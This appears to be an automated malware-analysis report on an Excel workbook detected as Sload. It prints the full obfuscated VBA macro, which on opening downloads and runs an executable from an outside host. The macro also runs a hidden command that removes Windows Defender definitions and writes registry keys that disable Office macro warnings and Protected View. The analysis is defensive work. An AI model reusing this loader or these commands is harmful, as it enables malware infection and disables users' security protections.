MALICIOUS
Risk Score: 488
Heuristics: 10

- ClamAV: Xls.Malware.Sload-7135989-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Sload-7135989-0
- VBA project inside OOXML [medium, 7 related findings] (OOXML_VBA): Document contains a VBA project — VBA macros present
- WScript.Shell usage [critical] (OLE_VBA_WSCRIPT): WScript.Shell usage
  Matched line in script:
  Set defender = CreateObject("WScript.Shell")
- VBA downloads and writes a file to disk [critical] (OLE_VBA_HTTP_DROP_EXEC): VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  Matched line in script:
  stream_obj.write http_obj.responseBody
- Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script:
  Set http_obj = CreateObject(kHTIv0Qus(StrReverse(aZqc2Fi8P(fb1m0tAyU("555149554E4D2F596775747073706A644E"))), StrReverse(aZqc2Fi8P(fb1m0tAyU("31")))))
- CreateObject call [high] (OLE_VBA_CREATEOBJ): CreateObject call
  Matched line in script:
  Set http_obj = CreateObject(kHTIv0Qus(StrReverse(aZqc2Fi8P(fb1m0tAyU("555149554E4D2F596775747073706A644E"))), StrReverse(aZqc2Fi8P(fb1m0tAyU("31")))))
- cmd.exe reference in VBA [high] (OLE_VBA_CMD): cmd.exe reference in VBA
  Matched line in script:
  Start = "cmd.exe /c cd ""%ProgramFiles%\Windows Defender"" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & exit"
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Workbook_Open macro [low] (OLE_VBA_WBOPEN): Workbook_Open macro
  Matched line in script:
  Private Sub Workbook_Open()
- Suspicious extracted artifact [high] (EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 18557 bytes |

SHA-256: 87154adde6595d96ea0b1760781e5aeb58c9cb03191558246950ddd14d15101a
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 112 of 184 identifiers look randomly generated (e.g. 'FUZcTsUAkgUpfVkuddPezMbIaLPpebUnkHdHDOSh') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "Module1"
Sub dshsdjufdjh()
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim http_obj
Dim stream_obj
Dim shell_obj
Set http_obj = CreateObject(kHTIv0Qus(StrReverse(aZqc2Fi8P(fb1m0tAyU("555149554E4D2F596775747073706A644E"))), StrReverse(aZqc2Fi8P(fb1m0tAyU("31")))))
Set stream_obj = CreateObject(kHTIv0Qus(StrReverse(aZqc2Fi8P(fb1m0tAyU("6773786B597A4834554A474A"))), StrReverse(StrReverse(aZqc2Fi8P(aZqc2Fi8P(fb1m0tAyU("36")))))))
Set shell_obj = CreateObject(kHTIv0Qus(StrReverse(aZqc2Fi8P(fb1m0tAyU("71716D6A33587579776E58685C"))), StrReverse(aZqc2Fi8P(fb1m0tAyU("35")))))
URL = "h" + "t" + "t" + "p" + ":" + "/" + "/" + "s" + "t" + "e" + "m" + "t" + "o" + "p" + "x" + "." + "c" + "o" + "m" + "/" + "w" + "o" + "r" + "k" + "/" + "n" + "/" + "15.exe" 'Where to download the file from
Filename = kHTIv0Qus(StrReverse(aZqc2Fi8P(fb1m0tAyU("816E376E3C3B7C7D51786C6575727E6B65597B7C7C6E655E4C43"))), StrReverse(StrReverse(aZqc2Fi8P(aZqc2Fi8P(fb1m0tAyU("39"))))))
RUNCMD = kHTIv0Qus(StrReverse(aZqc2Fi8P(fb1m0tAyU("816E376E3C3B7C7D51786C6575727E6B65597B7C7C6E655E4C43"))), StrReverse(StrReverse(aZqc2Fi8P(aZqc2Fi8P(fb1m0tAyU("39"))))))
http_obj.Open kHTIv0Qus(StrReverse(aZqc2Fi8P(fb1m0tAyU("4B5A4D"))), StrReverse(StrReverse(aZqc2Fi8P(aZqc2Fi8P(fb1m0tAyU("36")))))), URL, False
http_obj.send
stream_obj.Type = 1
stream_obj.Open
stream_obj.write http_obj.responseBody
stream_obj.savetofile Filename, 2
shell_obj.Run RUNCMD
Set defender = CreateObject("WScript.Shell")
Dim Start
Start = "cmd.exe /c cd ""%ProgramFiles%\Windows Defender"" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & exit"
defender.Run Start, vbHide
Set wso = CreateObject("WScript.Shell")
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\publisher\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\publisher\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\publisher\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\publisher\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\publisher\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
End Sub
Public Function kHTIv0Qus(W2vPrR0JL As String, bVb5dsmtB As Integer)
Dim knDHadpQC As Integer
For knDHadpQC = 1 To Len(W2vPrR0JL)
GoTo ItmtYykADGyQAfOKTKAOZHHuhIfrFnEuUIFzROmHgmiu:
jsCxbqIdwqgUUTZJCJoBAQTQOnCvfPkMRfpKYLxZvuVDUGK:
aERQhknfESLwegAdivsb = "NNpxmGlJbBcn"
GoTo LQQjgCYwplwNylvSNrtZtzwclmkpMSaERQhknfE
knfESLwegAdvsboNNpxKmG:
aERQhknfESLwegAdivsb = "NNpxmGlJbBcn"
GoTo JbBcnhziFpzFMetACLjeHJqwPYM
hxnqiGkOMujtkyIrreeFObCQBasspjByVFPVReuvQSc:
QBasDspjByVFPVReuv = "SczhJaGMgdIEE"
GoTo LhjsCxbqIdwqgLUTZJCJoBAQTQOnCvfNPkM
LQQjgCYwplwNylvSNrtZtzwclmkpMSaERQhknfE:
ziFpzFBMetACLje = "JqwPYMsonrd"
GoTo LwegAdivsboNNpxKmGlbBcnhziFpzFBMetACjeHJqwPYMsoonrdjqH
EDItmtYykADGyQAfKzTKAOZHHuhIfrFnEqUIFzROmHgmiuxL:
GKlLQQjgCYwplwNdylvS = "rtZtzGwcmkpM"
GoTo jsCxbqIdwqgUUTZJCJoBAQTQOnCvfPkMRfpKYLxZvuVDUGK
QBasDspjByVFPVRevQSczhJaGMgodI:
GoTo EDItmtYykADGyQAfKzTKAOZHHuhIfrFnEqUIFzROmHgmiuxL
fpKYLxZvuVDUGKlLQQjCYwplwNdylv:
qHihxnqiGkOMujDt = "yIreeFOb"
GoTo NrtZtzGwclmkpMSaERQ
LwegAdivsboNNpxKmGlbBcnhziFpzFBMetACjeHJqwPYMsoonrdjqH:
qHihxnqiGkOMujDt = "yIreeFOb"
GoTo hxnqiGkOMujtkyIrreeFObCQBasspjByVFPVReuvQSc
oonrdjqHihxnqikOMujDtkyIrreeFOb:
Mid(W2vPrR0JL, knDHadpQC, 1) = Chr(Asc(Mid(W2vPrR0JL, knDHadpQC, 1)) - bVb5dsmtB)
GoTo QBasDspjByVFPVRevQSczhJaGMgodI
NrtZtzGwclmkpMSaERQ:
ziFpzFBMetACLje = "JqwPYMsonrd"
GoTo knfESLwegAdvsboNNpxKmG
ItmtYykADGyQAfOKTKAOZHHuhIfrFnEuUIFzROmHgmiu:
QBasDspjByVFPVReuv = "SczhJaGMgdIEE"
GoTo fpKYLxZvuVDUGKlLQQjCYwplwNdylv
JbBcnhziFpzFMetACLjeHJqwPYM:
GKlLQQjgCYwplwNdylvS = "rtZtzGwcmkpM"
GoTo oonrdjqHihxnqikOMujDtkyIrreeFOb
LhjsCxbqIdwqgLUTZJCJoBAQTQOnCvfNPkM:
Next knDHadpQC
GoTo hIfrFnEquUIFzRmHgmiuxLhjsCxbqIdw:
hIfrFnEquUIFzRmHgmiuxLhjsCxbqIdw:
JaGMgodIEEDItmt = "ykADGyQAfOzTKAOZHH"
GoTo QOnCvfNPkMRfpKYLxZv
VDUGKlLQQjgCYwlwNdylvSNrtZt:
ERQhknfESLwegAdvsboNNpxKmGlJbB = "nhiFpzFBetACLjeH"
GoTo GwclmkpMSaERQhkfESLwegAdivs
vQSczhJaGMgodIEDItmtYykADGyQAf:
CvfNPkMRfpKYLxZv = "VDUGKLQQgCY"
GoTo KzTKAOZHHuhIfrFnEqUIFzROmHgmiuxLjsCxbqIdwqg
QOnCvfNPkMRfpKYLxZv:
qwPYMsoonrdjqHihxnqGkOMujDtkyIrree = "ObCQBasspjByVFVReuvQScz"
GoTo VDUGKlLQQjgCYwlwNdylvSNrtZt
KzTKAOZHHuhIfrFnEqUIFzROmHgmiuxLjsCxbqIdwqg:
plwNdylvSNrtZtzGw = "lmpMS"
GoTo UUTZJCJoBAQTQOnCvfPkMRfpKYLxZvuVDUGKLQQjgCYwplwN
UUTZJCJoBAQTQOnCvfPkMRfpKYLxZvuVDUGKLQQjgCYwplwN:
ERQhknfESLwegAdvsboNNpxKmGlJbB = "nhiFpzFBetACLjeH"
GoTo ylvSNrtZtzwclmkpMSaERQhknfELwegAdivsboNNpxKmGlbBcnhziFpzFBMetAC
jeHJqwPYMsoonrdjqHhxnqiGkOMujtkyIrreeFObCQBasspjByVFPVReuvQSc:
JaGMgodIEEDItmt = "ykADGyQAfOzTKAOZHH"
GoTo gLUUTZJCJoBAQ
ylvSNrtZtzwclmkpMSaERQhknfELwegAdivsboNNpxKmGlbBcnhziFpzFBMetAC:
qwPYMsoonrdjqHihxnqGkOMujDtkyIrree = "ObCQBasspjByVFVReuvQScz"
GoTo jeHJqwPYMsoonrdjqHhxnqiGkOMujtkyIrreeFObCQBasspjByVFPVReuvQSc
oNNpxKmGlJBcnhziFpzF:
CvfNPkMRfpKYLxZv = "VDUGKLQQgCY"
GoTo MetACLjeHJqwPYMoonrdjqHihxnqi
GwclmkpMSaERQhkfESLwegAdivs:
plwNdylvSNrtZtzGw = "lmpMS"
GoTo oNNpxKmGlJBcnhziFpzF
MetACLjeHJqwPYMoonrdjqHihxnqi:
kHTIv0Qus = W2vPrR0JL
GoTo kOMujDtkyIrreeFObQBasDspjByVFPVRe
kOMujDtkyIrreeFObQBasDspjByVFPVRe:
GoTo vQSczhJaGMgodIEDItmtYykADGyQAf
gLUUTZJCJoBAQ:
End Function
Public Function aZqc2Fi8P(EeCKcay1n As String) As String
Dim bVb5dsmtB As Variant
For bVb5dsmtB = 1 To Len(EeCKcay1n) Step 2
GoTo UrbmrnzQfnox:
bZeOVdtTTjcTtVAygUpgkvedQQsAMpIoLeqecVol:
GoTo rCHEPhiDENmSwLsyRPvqrpufYgJVmqskJmQBxlF
cTtVAygUpgkvedQQsAMpIoLeqecVolrCHEPhiDENmSwLsyR:
pHtxQxICURoKjbQjzOk = "hEzdfLgltjQYVbyFMrD"
GoTo PvqrpufYgJVmqskJmQBxlFnBLuthTuQdsZqd
xICURoKjbQjzOkYhEzdfgltjOQYVbyFMrDDSQa:
pHtxQxICURoKjbQjzOk = "hEzdfLgltjQYVbyFMrD"
GoTo qFyiPSnPTieNbAAckwZYvNnNZSlUrbmrnQfnoxVPtvciBJzfbZeOVdtTTj
qFyiPSnPTieNbAAckwZYvNnNZSlUrbmrnQfnoxVPtvciBJzfbZeOVdtTTj:
SQaQqFyiPSnPTieNbA = "ckwZsYNnNZS"
GoTo PtvciBJzfabZeOVdtTTj
mCGJAaphRzBQDRcwKxkKhgIpHtxxICURoKjbQjzOkYhEzdf:
mSwLsyRaPvqrpufYgJl = "mqskJmQBxlwnBLuth"
GoTo gltjOQYVbyFMrDDSQaqFyiPSnPTieNbAAckwZYvNnNZSlUrbmrnQfnoxVPtvciBJzf
dRyGHFKvpwamCGJAaphRzBQDRcwKxkKhgIpHtx:
cvPidRyGHFKvpwanmCG = "AaphRzBQDRcwKxKhg"
GoTo xICURoKjbQjzOkYhEzdfgltjOQYVbyFMrDDSQa
nBLuthTuQdsZqdGusmEBYuSZUjyTUfojMcvP:
uQdsZqdhGusmEBYuSZUg = "yTUoj"
GoTo dRyGHFKvpwamCGJAaphRzBQDRcwKxkKhgIpHtx
rCHEPhiDENmSwLsyRPvqrpufYgJVmqskJmQBxlF:
mSwLsyRaPvqrpufYgJl = "mqskJmQBxlwnBLuth"
GoTo nBLuthTuQdsZqdGusmEBYuSZUjyTUfojMcvP
PvqrpufYgJVmqskJmQBxlFnBLuthTuQdsZqd:
cvPidRyGHFKvpwanmCG = "AaphRzBQDRcwKxKhg"
GoTo GusmEBYuSZUjyTUfojMcvPdRyGHFKvpwa
GusmEBYuSZUjyTUfojMcvPdRyGHFKvpwa:
uQdsZqdhGusmEBYuSZUg = "yTUoj"
GoTo mCGJAaphRzBQDRcwKxkKhgIpHtxxICURoKjbQjzOkYhEzdf
gltjOQYVbyFMrDDSQaqFyiPSnPTieNbAAckwZYvNnNZSlUrbmrnQfnoxVPtvciBJzf:
aZqc2Fi8P = aZqc2Fi8P & StrReverse(Mid(EeCKcay1n, bVb5dsmtB, 2))
GoTo bZeOVdtTTjcTtVAygUpgkvedQQsAMpIoLeqecVol
UrbmrnzQfnox:
SQaQqFyiPSnPTieNbA = "ckwZsYNnNZS"
GoTo cTtVAygUpgkvedQQsAMpIoLeqecVolrCHEPhiDENmSwLsyR
PtvciBJzfabZeOVdtTTj:
DoEvents
Next bVb5dsmtB
End Function
Public Function fb1m0tAyU(ByVal xU56UzmMC As String)
Dim bVb5dsmtB As Long, HfGzi82RI As String, P35pljJqE As String
On Local Error Resume Next
For bVb5dsmtB = 1 To Len(xU56UzmMC) Step 2
GoTo lpskIYQAilFimAKgtgSu:
VyCQNwJjjKSfHbG:
izNVQhEzdeKRksiNIJHMELcDCSILCcEkhPDZO = "TeMMzzbwYrvMZNKEQTqa"
GoTo wQwHBTDaJUbizNVQhEzdeKRksiNIJHMELcDCSILCcEkhPD
eZaYdOHOtTFUZcT:
HfGzi82RI = HfGzi82RI & Chr$(Val("&H" & Mid$(xU56UzmMC, bVb5dsmtB, 2)))
GoTo UAkgUpfVkuddPezMbIaLPpebUnkHdHDOShCENYRvLeyRBhqqptfYfJVVlpskIY
lpskIYQAilFimAKgtgSu:
uddPCezMbIaLPpebnkHdBHDOShCENYRvLeyR = "BhqqptfYJV"
GoTo SGPojLNuOTcRxGGKhovanmCFIAZohQz
OFTeMMzzbjwYrQvMZNKETqalrnyPQmnxUBfvbiBI:
gSuQOrZqcgFgrlDAYRJGRjxSGPojLNuOTc = "xGGFKhovamCFI"
GoTo eZaYdOHOtTFUZcT
jxSGPojLNuOTcRxGGFKovanmCFIAZoQzBVyCQNwJj:
ZohQzBVyCQNwJjjKSf = "bGfwQwHTDaJUb"
GoTo KSfHbGfwQwHBDaJUbQizNVQhEzdeKRkiNIJHMxELcDCSI
CcEkhPDZOFTeMMzzbwYrQvMZNKEQTalrnyPQmnxUBfbiBIyeZaYdOHOt:
rnyPQmnxUBfvbiBI = "eZaYdOOtTFUZcsUAkgUpfV"
GoTo FUZcTsUAkgUpfVkuddPezMbIaLPpebUnkHdHDOShCENYRvLeyRBhqqptfYfJVVlpskIY
wQwHBTDaJUbizNVQhEzdeKRksiNIJHMELcDCSILCcEkhPD:
ZohQzBVyCQNwJjjKSf = "bGfwQwHTDaJUb"
GoTo OFTeMMzzbjwYrQvMZNKETqalrnyPQmnxUBfvbiBI
UAkgUpfVkuddPezMbIaLPpebUnkHdHDOShCENYRvLeyRBhqqptfYfJVVlpskIY:
GoTo AilFimAKgtgSuQOrZqcFgrlDAYtRJG
KSfHbGfwQwHBDaJUbQizNVQhEzdeKRkiNIJHMxELcDCSI:
izNVQhEzdeKRksiNIJHMELcDCSILCcEkhPDZO = "TeMMzzbwYrvMZNKEQTqa"
GoTo CcEkhPDZOFTeMMzzbwYrQvMZNKEQTalrnyPQmnxUBfbiBIyeZaYdOHOt
AilFimAKgtgSuQOrZqcFgrlDAYtRJG:
gSuQOrZqcgFgrlDAYRJGRjxSGPojLNuOTc = "xGGFKhovamCFI"
GoTo jxSGPojLNuOTcRxGGFKovanmCFIAZoQzBVyCQNwJj
FUZcTsUAkgUpfVkuddPezMbIaLPpebUnkHdHDOShCENYRvLeyRBhqqptfYfJVVlpskIY:
uddPCezMbIaLPpebnkHdBHDOShCENYRvLeyR = "BhqqptfYJV"
GoTo OrZqcgFgrlDAYtRJGRj
SGPojLNuOTcRxGGKhovanmCFIAZohQz:
rnyPQmnxUBfvbiBI = "eZaYdOOtTFUZcsUAkgUpfV"
GoTo VyCQNwJjjKSfHbG
OrZqcgFgrlDAYtRJGRj:
Next bVb5dsmtB
GoTo AilFimAKgtgSuQOrZqcFgrlDAYtRJGjxSGPojLNuOTcRxGGFKovanmCFIAZo:
DQfTAvvuzkryOpo:
tTFUZcTsUAkgUpfVkud = "PCzM"
GoTo uxpNrVTBqKBsFPyy
mMViKeJhzLzw:
MxELcDCSILCcEkhPDZ = "FTeMMzzbjYrQvM"
GoTo IGdMQdZlBCYaj
oRhNTnvlQLLKPAtAf:
fb1m0tAyU = HfGzi82RI
GoTo rHKNFeHmQRGbRIVg
cdbgQJQvIHYceVvKCnU:
NKEQTqalrnyPQmnxUBfv = "iByeZaYdOH"
GoTo rTZmxRfSEgCBdKcNRsSe
uxpNrVTBqKBsFPyy:
NKEQTqalrnyPQmnxUBfv = "iByeZaYdOH"
GoTo mMViKeJhzLzw
rHKNFeHmQRGbRIVg:
GoTo OCoPmyMuLxBcPNHaQt
otpBETpqzJEixQkDyn:
MxELcDCSILCcEkhPDZ = "FTeMMzzbjYrQvM"
GoTo cdbgQJQvIHYceVvKCnU
OCoPmyMuLxBcPNHaQt:
hQzBVyCQNwJjjKSfbGfwQwHBTDaJUbQizN = "QhEzdeKRksNIJ"
GoTo otpBETpqzJEixQkDyn
IGdMQdZlBCYaj:
hQzBVyCQNwJjjKSfbGfwQwHBTDaJUbQizN = "QhEzdeKRksNIJ"
GoTo oRhNTnvlQLLKPAtAf
rTZmxRfSEgCBdKcNRsSe:
tTFUZcTsUAkgUpfVkud = "PCzM"
GoTo qnJgEwsEUkFtCaUyAhAG
qnJgEwsEUkFtCaUyAhAG:
IaLPpebUnkHdBHDShCENYRvLeyRLBhqqpt = "YfVVlpskIY"
GoTo QzBVyCQNwJjKSfHbGfwQwHBpMwGMIUlAHJSqlOQ
AilFimAKgtgSuQOrZqcFgrlDAYtRJGjxSGPojLNuOTcRxGGFKovanmCFIAZo:
IaLPpebUnkHdBHDShCENYRvLeyRLBhqqpt = "YfVVlpskIY"
GoTo DQfTAvvuzkryOpo
QzBVyCQNwJjKSfHbGfwQwHBpMwGMIUlAHJSqlOQ:
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 67584 bytes |

SHA-256: 676439d62b2f02978b9bce580ecf4f3fff58f07241db4b857c59e9f9cc0c3390
Detection:
- ClamAV: Xls.Malware.Sload-7135989-0
- Obfuscation or payload: likely. 266 of 445 identifiers look randomly generated (e.g. 'FUZcTsUAkgUpfVkuddPezMbIaLPpebUnkHdHDOSh') — consistent with name-mangling obfuscation.